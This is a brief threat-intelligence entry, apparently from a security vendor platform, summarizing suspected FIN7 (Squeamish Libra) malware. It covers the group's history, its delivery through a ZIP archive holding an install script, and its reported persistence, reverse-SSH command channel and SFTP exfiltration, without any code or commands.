The Reveal Platform
Intel Name: Suspected squeamish libra (fin7) malware
Date of Scan: November 19, 2025
Impact: High
Summary: FIN7 has been active since at least 2013, previously targeting sectors such as retail, hospitality, and financial services. The group shifted its monetization strategy from POS malware to big-game-hunting ransomware over time. Although widely analyzed, the malware’s code has changed very little since its early versions. It appears to have been used in real-world attacks since at least 2022. The payload is typically retrieved from a remote server hosting a ZIP archive containing an “install.bat” script. Open-source reporting indicates the malware provides persistence, reverse SSH tunneling for C2, and data exfiltration via SFTP.
